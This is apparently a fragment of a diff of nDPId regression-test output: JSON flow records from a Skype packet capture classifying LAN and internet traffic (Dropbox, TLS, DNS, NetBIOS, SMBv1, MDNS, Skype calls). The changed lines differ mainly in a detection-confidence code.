-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match 
by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
-00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 